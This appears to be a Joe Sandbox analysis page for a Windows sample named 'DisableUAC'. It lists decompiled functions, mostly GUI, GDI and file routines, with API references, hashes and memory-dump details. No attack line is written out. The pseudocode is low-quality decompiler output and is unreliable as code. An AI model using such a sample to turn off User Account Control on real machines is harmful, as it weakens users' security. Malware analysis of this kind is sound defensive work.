Instruction ID: 8ef8e950c0767274f12762c70f4419fe8b09ee409a319945d04523b3529ed192
Opcode Fuzzy Hash: 4283391745e343b60f0c11e5d844a91cee9ba976e5d692490ae9ea9578580604
Instruction Fuzzy Hash: 5B111F71615A8486E7658B26E4487A92261E38CFF0F291321EFBA077F8CF39C8428740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E514 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0000000114000E514(void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, signed long long __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed int _v24;
				long _t15;
				void* _t20;
				void* _t21;
				void* _t31;
				void* _t34;
				signed long long _t49;
				void* _t51;
				struct HWND__* _t59;

				_t31 = _t51;
				 *((long long*)(_t31 + 8)) = __rbx;
				 *((long long*)(_t31 + 0x10)) = __rbp;
				 *((long long*)(_t31 + 0x18)) = __rsi;
				 *((long long*)(_t31 + 0x20)) = __rdi;
				_t49 = __r9;
				_t20 = __edx;
				E0000000114000DFD0(__edx, _t21, __rbx, __rcx, __rcx, __r8, __r9);
				_t34 = _t31;
				if (_t20 == 5) goto 0x4000e5a0;
				GetPropA(_t59);
				if (_t31 == 0) goto 0x4000e5a0;
				if (_t34 == 0xd0d0d0d1) goto 0x4000e587;
				if (_t20 == 0x120) goto 0x4000e587;
				if (_t20 == 7) goto 0x4000e587;
				r8d = 0x111;
				if (_t20 != r8d) goto 0x4000e5c4;
				if (_t49 != 0) goto 0x4000e5c4;
				_v24 = _v24 & _t49;
				goto 0x4000e58f;
				_v24 = _t49;
				r8d = _t20;
				DefFrameProcA(??, ??, ??, ??, ??);
				goto 0x4000e5c7;
				SetLastError(??);
				if (_t34 != 0xd0d0d0d1) goto 0x4000e5c4;
				_t15 = DefWindowProcA(??, ??, ??, ??);
				goto 0x4000e5c7;
				return _t15;
			}

0x14000e514
0x14000e517
0x14000e51b
0x14000e51f
0x14000e523
0x14000e52d
0x14000e533
0x14000e538
0x14000e53d
0x14000e543
0x14000e54f
0x14000e558
0x14000e561
0x14000e569
0x14000e56e
0x14000e570
0x14000e579
0x14000e57e
0x14000e580
0x14000e585
0x14000e587
0x14000e58c
0x14000e598
0x14000e59e
0x14000e5a2
0x14000e5af
0x14000e5bc
0x14000e5c2
0x14000e5e1

APIs

Part of subcall function 000000014000DFD0: GetPropA.USER32 ref: 000000014000E020
Part of subcall function 000000014000DFD0: GetParent.USER32 ref: 000000014000E031
Part of subcall function 000000014000DFD0: RemovePropA.USER32 ref: 000000014000E107

GetPropA.USER32 ref: 000000014000E54F
DefFrameProcA.USER32 ref: 000000014000E598
SetLastError.KERNEL32 ref: 000000014000E5A2
DefWindowProcA.USER32 ref: 000000014000E5BC

Strings

PB_MDI_Gadget, xrefs: 000000014000E545

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Prop$Proc$ErrorFrameLastParentRemoveWindow
String ID: PB_MDI_Gadget
API String ID: 127825664-983833826
Opcode ID: a734fdcfb83c245a9a60ec04fd0150a4164f5a6fb0223d069ef89ea535b99b58
Instruction ID: 7d29d4199b24223881b47e2553f5846b6980a9b911bfd6d73075b36d09503b00
Opcode Fuzzy Hash: a734fdcfb83c245a9a60ec04fd0150a4164f5a6fb0223d069ef89ea535b99b58
Instruction Fuzzy Hash: 0C119AB1704B9085EA268B17B8507ACB2A1A79CFD9F5C0A16FF1927BF4EF78C4418705

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D2B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 000000014000D30B
SetWindowLongPtrA.USER32 ref: 000000014000D320
SetPropA.USER32 ref: 000000014000D333
SendMessageA.USER32 ref: 000000014000D34A

Strings

PB_ID, xrefs: 000000014000D326

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: LongWindow$MessagePropSend
String ID: PB_ID
API String ID: 499798845-4173770792
Opcode ID: 3ca7fbd83ff6416455aee109a78265942f54ca99479ce5f3c85fd221dc5bb6fe
Instruction ID: 9738f8c356b1b0d55fa1a02de78d9ef0bb32af56174963e3b41bc5e39545926d
Opcode Fuzzy Hash: 3ca7fbd83ff6416455aee109a78265942f54ca99479ce5f3c85fd221dc5bb6fe
Instruction Fuzzy Hash: 83113A71210B9486E6049F27F8417887764F389FE0F988615EF691BBA8CF39D551C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010078 Relevance: 7.6, APIs: 5, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00000001140010078(signed int __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, void* __r11, signed int _a40, signed int _a48) {
				void* _v40;
				void _v48;
				void* _v72;
				signed int _v88;
				signed int _v96;
				signed int _v104;
				signed int _t45;
				signed int _t59;
				signed int _t67;
				void* _t71;
				signed int* _t78;
				void* _t89;
				void* _t95;
				void* _t107;
				void* _t108;
				int _t110;
				void* _t114;
				int _t116;
				void* _t119;
				signed int* _t120;

				_t108 = __r11;
				_t93 = __rbp;
				_t91 = __rsi;
				_t71 = _t95;
				 *((long long*)(_t71 + 8)) = __rbx;
				 *((long long*)(_t71 + 0x10)) = __rbp;
				 *((long long*)(_t71 + 0x18)) = __rsi;
				r13d = r8d;
				_t73 = __rcx;
				GetObjectA(_t119, _t116, _t114);
				r15d = 0;
				_t120 =  !=  ? _v48 : _t119;
				GetObjectA(??, ??, ??);
				r14d = 0;
				_t117 =  !=  ? _v48 : _t116;
				if (_t120 == 0) goto 0x400101f3;
				if (( !=  ? _v48 : _t116) == 0) goto 0x400101f3;
				_t45 = _a48;
				_t59 = _a40;
				_t78 = _t120;
				if (_t45 <= 0) goto 0x40010128;
				if (_t59 <= 0) goto 0x40010123;
				_t67 =  *_t78 & 0xff000000;
				r9d = 0xffffff;
				_t30 =  ==  ? r9d :  *_t78;
				 *_t78 =  ==  ? r9d :  *_t78;
				if (_t67 != 0) goto 0x40010106;
				_t88 = __rdx - 1;
				if (_t67 != 0) goto 0x400100ff;
				if (__edx * _t45 - r13d * _t59 > 0) goto 0x40010192;
				malloc(_t110);
				if (_t71 == 0) goto 0x400101f3;
				r9d = __edx;
				_v96 = 4;
				_v104 = _t45;
				E0000000114000FB54(_t59, __rcx, _t120, __rdx - 1, __rsi, __rbp, _t71, _t89);
				_v88 = 4;
				r8d = _t45;
				_v96 = r13d;
				_v104 = __edx;
				E0000000114000FD38(_t45, __edx, 0, _t73, _t71,  !=  ? _v48 : _t116, _t107, _t108);
				goto 0x400101e6;
				malloc(??);
				if (_t71 == 0) goto 0x400101f3;
				_v88 = 4;
				r8d = _t45;
				_v96 = r13d;
				_v104 = _t59;
				E0000000114000FD38(_t45, _t59, 0, _t73, _t120, _t71, _t107, _t108);
				r9d = __edx;
				_v96 = 4;
				_v104 = r13d;
				E0000000114000FB54(_t59, _t73, _t71, _t88, _t91, _t93,  !=  ? _v48 : _t116);
				free(??);
				return 1;
			}

0x140010078
0x140010078
0x140010078
0x140010078
0x14001007b
0x14001007f
0x140010083
0x140010094
0x140010099
0x1400100aa
0x1400100b5
0x1400100bf
0x1400100c5
0x1400100cb
0x1400100d0
0x1400100d9
0x1400100e2
0x1400100e8
0x1400100ef
0x1400100f6
0x1400100fb
0x140010101
0x140010106
0x14001010e
0x140010114
0x140010118
0x140010121
0x140010123
0x140010126
0x140010137
0x140010142
0x14001014d
0x140010153
0x14001015e
0x140010166
0x14001016a
0x14001016f
0x14001017a
0x140010182
0x140010187
0x14001018b
0x140010190
0x14001019b
0x1400101a6
0x1400101a8
0x1400101b3
0x1400101bb
0x1400101c0
0x1400101c4
0x1400101c9
0x1400101d4
0x1400101dc
0x1400101e1
0x1400101e9
0x140010212

APIs

GetObjectA.GDI32 ref: 00000001400100AA
GetObjectA.GDI32 ref: 00000001400100C5
malloc.MSVCRT ref: 0000000140010142
malloc.MSVCRT ref: 000000014001019B
free.MSVCRT ref: 00000001400101E9

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Objectmalloc$free
String ID:
API String ID: 1714650895-0
Opcode ID: 507c67db8aa4317be71b53bb285ccda56dd7841b17fb8a96d7975c023a4bdcb1
Instruction ID: f3fec5900dc8f2585c3266bdea787dd03c854729729b95e687a08be7369ae0c0
Opcode Fuzzy Hash: 507c67db8aa4317be71b53bb285ccda56dd7841b17fb8a96d7975c023a4bdcb1
Instruction Fuzzy Hash: 4441AF7270079087EA25DF07A85079ABA94F78CFC4F144129FF498B765CBBDC9468B44

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000ED88 Relevance: 7.6, APIs: 5, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0000000114000ED88(void* __esi, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, char _a16, long long _a24) {
				void* _v8;
				intOrPtr _v102;
				void* _v120;
				signed int _v134;
				intOrPtr _v144;
				intOrPtr _v148;
				void* _v152;
				void* __rdi;
				intOrPtr _t34;
				void* _t51;

				_t51 = __rax;
				_a8 = __rbx;
				_a24 = __rsi;
				if ( *0x4001d588 == 0) goto 0x4000ee89;
				if (GetObjectType(??) != 7) goto 0x4000ee89;
				if (GetObjectA(??, ??, ??) != 0x68) goto 0x4000edea;
				if (_v102 != 0x20) goto 0x4000ee89;
				goto 0x4000ee8b;
				if (GetObjectA(??, ??, ??) != 0x20) goto 0x4000ee89;
				E000000011400102B8(_v148, _v134 & 0x0000ffff, __rcx);
				if (_v134 != 0x20) goto 0x4000ee89;
				E0000000114000EC64(__rbx, __rcx,  &_a16, __rcx, _t51);
				if (_t51 == 0) goto 0x4000ee89;
				_t34 = _v144;
				if (_t34 <= 0) goto 0x4000ee6d;
				r11d = _v148;
				r8d = 0;
				r10d = 0;
				if (r11d <= 0) goto 0x4000ee64;
				if (( *(r8d + _t51) & 0xff000000) != 0) goto 0x4000eea0;
				r10d = r10d + 1;
				if (r10d - r11d < 0) goto 0x4000ee4f;
				r8d = r8d + __esi;
				if (1 - _t34 < 0) goto 0x4000ee41;
				if (_a16 == 0) goto 0x4000ee89;
				HeapFree(??, ??, ??);
				return 0;
			}

0x14000ed88
0x14000ed88
0x14000ed8d
0x14000eda5
0x14000edb4
0x14000edd3
0x14000edda
0x14000ede5
0x14000edfc
0x14000ee0b
0x14000ee18
0x14000ee25
0x14000ee2d
0x14000ee2f
0x14000ee37
0x14000ee39
0x14000ee3e
0x14000ee44
0x14000ee4d
0x14000ee56
0x14000ee58
0x14000ee62
0x14000ee66
0x14000ee6b
0x14000ee75
0x14000ee83
0x14000ee9f

APIs

GetObjectType.GDI32 ref: 000000014000EDAB
GetObjectA.GDI32 ref: 000000014000EDC5
GetObjectA.GDI32 ref: 000000014000EDF4
HeapFree.KERNEL32 ref: 000000014000EE83
HeapFree.KERNEL32 ref: 000000014000EEBA

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Object$FreeHeap$Type
String ID:
API String ID: 1123114911-0
Opcode ID: 04f89bcd71fd431572fd257a5e5056b370d5c51a98ba4d18032c316ad5b8cd57
Instruction ID: 61dbf061918b9e639ce357c54d53a1e48562895a2d1f854822a43c1ef0bd6671
Opcode Fuzzy Hash: 04f89bcd71fd431572fd257a5e5056b370d5c51a98ba4d18032c316ad5b8cd57
Instruction Fuzzy Hash: 6531BCB16046C481EB66DB53F5547EA22A2E78C7C0F548025FB4E17BA9CF39C985C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000F150 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

GetObjectA.GDI32 ref: 000000014000F1AC
CreateCompatibleDC.GDI32 ref: 000000014000F1D6
SelectObject.GDI32 ref: 000000014000F1F3
DeleteDC.GDI32 ref: 000000014000F254
SelectObject.GDI32 ref: 000000014000F267

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Object$Select$CompatibleCreateDelete
String ID:
API String ID: 2280115113-0
Opcode ID: 436845608f3c0d8dca97deb8e01a872491236cf11f7652da45d8497181b463f5
Instruction ID: e94e76e15d7fa21732b097f1589ac13e4eea34d4a6f72b01a45f92b000fdcc60
Opcode Fuzzy Hash: 436845608f3c0d8dca97deb8e01a872491236cf11f7652da45d8497181b463f5
Instruction Fuzzy Hash: A7316976608B8486D765CF12F4007DAB7A1F388BC4F488026EF8957B69CB78C884DB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000BB50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 000000014000BB6C
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000BB87
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000BBC2
RtlVirtualUnwind.KERNEL32 ref: 000000014000BC30
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000BC56

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: EntryFunctionLookup$UnwindVirtualmemmove
String ID:
API String ID: 2745470327-0
Opcode ID: 138e66b3365d3ff7f5a20df39f1b391006e7ac867718001ec0c3b6a82183a8bf
Instruction ID: 43a577404f022cfd33e10d07bf02a677111bdbb886d2a1dd42271365da4ac49e
Opcode Fuzzy Hash: 138e66b3365d3ff7f5a20df39f1b391006e7ac867718001ec0c3b6a82183a8bf
Instruction Fuzzy Hash: 0231E036209B8581DE71CB16F4907DA63A0FB8DBC5F485125AF8D47B69EF78C585CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000AAFC Relevance: 7.6, APIs: 5, Instructions: 53filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000A924: HeapAlloc.KERNEL32 ref: 000000014000A9AE
Part of subcall function 000000014000A924: SetFilePointer.KERNEL32 ref: 000000014000A9D8
Part of subcall function 000000014000A924: ReadFile.KERNEL32 ref: 000000014000A9FE
Part of subcall function 000000014000A924: HeapFree.KERNEL32 ref: 000000014000AAA2

CreateFileA.KERNEL32 ref: 000000014000AB58
WriteFile.KERNEL32 ref: 000000014000AB7C
CloseHandle.KERNEL32 ref: 000000014000AB95
DeleteFileA.KERNEL32 ref: 000000014000ABA4
HeapFree.KERNEL32 ref: 000000014000ABB6

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$Heap$Free$AllocCloseCreateDeleteHandlePointerReadWrite
String ID:
API String ID: 1377932795-0
Opcode ID: dd9a2eccf128c0d6fcc236f0d39680b22df8f9dbc57249da8e79b8a722989bd6
Instruction ID: 6a15a6bb998399cd35284b3deac7db3561ecf502e9edfa679de6a7936c145bec
Opcode Fuzzy Hash: dd9a2eccf128c0d6fcc236f0d39680b22df8f9dbc57249da8e79b8a722989bd6
Instruction Fuzzy Hash: E8112972214B9086F621DB27B91479A77A1F789BE4F444314AFA907BE8DF3DC545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013CC0 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140013CDD
LeaveCriticalSection.KERNEL32 ref: 0000000140013D4D

Part of subcall function 0000000140013CC0: HeapFree.KERNEL32 ref: 0000000140013D40

DeleteCriticalSection.KERNEL32 ref: 0000000140013D64
HeapFree.KERNEL32 ref: 0000000140013D76

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 91a5a98bc4ef07d40cde1d0759524a13b0bc11fc1dac1a0a2af29042e1f787fc
Instruction ID: effe7ef239a78b728cd287e596cad24f11e4236d83fbd531bb22694c2a8970bc
Opcode Fuzzy Hash: 91a5a98bc4ef07d40cde1d0759524a13b0bc11fc1dac1a0a2af29042e1f787fc
Instruction Fuzzy Hash: 6221E536201A4886EB569B27F5943A833B1FB4CBC4F484526EB4A4BB74CF3AC855C301

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E6FC Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON

Download Yara Rule

APIs

IsWindowEnabled.USER32 ref: 000000014000E716
IsWindowVisible.USER32 ref: 000000014000E723
GetWindowLongPtrA.USER32 ref: 000000014000E733
SetFocus.USER32 ref: 000000014000E749
SetFocus.USER32 ref: 000000014000E75E

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$Focus$EnabledLongVisible
String ID:
API String ID: 1625685152-0
Opcode ID: 9feaefde347a24cb2cb0a94af26b42b887380b882b2b8571015e3c2e23e1e3ac
Instruction ID: 4a730dae0eb96163c4bb023d0dd437d07feab4eb02e957b2b6f53bfdf6d80fcb
Opcode Fuzzy Hash: 9feaefde347a24cb2cb0a94af26b42b887380b882b2b8571015e3c2e23e1e3ac
Instruction Fuzzy Hash: DC01E97120868087FB25CF17B5943BD62A1F74CBC1F444524EBAA57AA4DF78C585C781

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C698 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

SetTextColor.GDI32 ref: 000000014000C6CA
GetSysColor.USER32 ref: 000000014000C6DE
SetBkColor.GDI32 ref: 000000014000C6E9
GetSysColorBrush.USER32 ref: 000000014000C6F1
SetBkColor.GDI32 ref: 000000014000C707

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Color$BrushText
String ID:
API String ID: 3324192670-0
Opcode ID: 54070461e00bf9abbf6e960aae8de2f94ea233b40133a55eb584b9cff69cf57d
Instruction ID: 318b38ad82969b2b998a7309579c554e03a3a1ec6767edd4b25ee3ee960203c1
Opcode Fuzzy Hash: 54070461e00bf9abbf6e960aae8de2f94ea233b40133a55eb584b9cff69cf57d
Instruction Fuzzy Hash: 6B01E975615B4482E6658B26A9447A92262E38CBF4F284311EF7A077F8DF39C8938700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000378D Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140014780: strlen.MSVCRT ref: 0000000140014796

Part of subcall function 00000001400145C0: HeapAlloc.KERNEL32 ref: 0000000140014603

Part of subcall function 0000000140009924: MessageBoxA.USER32 ref: 0000000140009957

Part of subcall function 0000000140004811: RemoveDirectoryA.KERNEL32(000000014001B13D,0000000140004B7B,02370A20,000000014001B13D,0000000140005127), ref: 00000001400048F0

Part of subcall function 000000014001096C: SetFileAttributesA.KERNEL32 ref: 0000000140010950
Part of subcall function 000000014001096C: DeleteFileA.KERNEL32 ref: 0000000140010959

RemoveDirectoryA.KERNEL32 ref: 0000000140003CE6
RemoveDirectoryA.KERNEL32 ref: 0000000140003CFE

Strings

?\BFINOPSX, xrefs: 000000014000390F, 0000000140003B09
, xrefs: 0000000140003C3A

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: DirectoryRemove$File$AllocAttributesDeleteHeapMessagestrlen
String ID: $?\BFINOPSX
API String ID: 242175043-3073391928
Opcode ID: d2a239c4af21a519c315509e332d8b39db2652e14b10efdeb97f543c72852c87
Instruction ID: b85dd97916b976c2d281b7f056d28cfedb1b30d51a9c4dc4a8bac63f56f57c92
Opcode Fuzzy Hash: d2a239c4af21a519c315509e332d8b39db2652e14b10efdeb97f543c72852c87
Instruction Fuzzy Hash: 85E13DB6A18A44D5EB07AFA7BC867E93661F75D3D4F101411FB4C0B6B2EE3AC0918710

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000CB0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000CB5D
CreateWindowExA.USER32 ref: 000000014000CC54
SetWindowLongPtrA.USER32 ref: 000000014000CC82

Strings

Edit, xrefs: 000000014000CBFC

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$CreateLongmemset
String ID: Edit
API String ID: 2917088559-554135844
Opcode ID: 635251158aa4473db54df2b23c1d7ef1b7c13ddc5fee8a463e6f20a2426ae652
Instruction ID: 1b3321e3f38f721da190e8917023d844f48beea4daca6662e4ab00a7f8167963
Opcode Fuzzy Hash: 635251158aa4473db54df2b23c1d7ef1b7c13ddc5fee8a463e6f20a2426ae652
Instruction Fuzzy Hash: 0B41D1B5215B4499E612DB02F9847C6B7A8F74CBD8F50022AEA9D0BBB4EB3DC145C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A788 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 000000014000A7CC
ReadFile.KERNEL32 ref: 000000014000A7F1
HeapAlloc.KERNEL32 ref: 000000014000A81B

Strings

1zlp, xrefs: 000000014000A827

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$AllocCreateHeapRead
String ID: 1zlp
API String ID: 4160796404-2851666121
Opcode ID: a6f70111ba6bacfd4e4cd120bb7e6ce94af0ad4873e3daec3c2a58904f0635e2
Instruction ID: 34ead6c4024fbd43c1b58e53056a179eafa0461e0bf63abb77f61f638d345adc
Opcode Fuzzy Hash: a6f70111ba6bacfd4e4cd120bb7e6ce94af0ad4873e3daec3c2a58904f0635e2
Instruction Fuzzy Hash: AD113D7220478086EB55CF52F45034AB7A0F788BE4F988225EB9D07BA8DF7CC549CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 000000014000A890
WriteFile.KERNEL32 ref: 000000014000A8BD
HeapAlloc.KERNEL32 ref: 000000014000A8D1

Strings

2zlp, xrefs: 000000014000A8B0

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
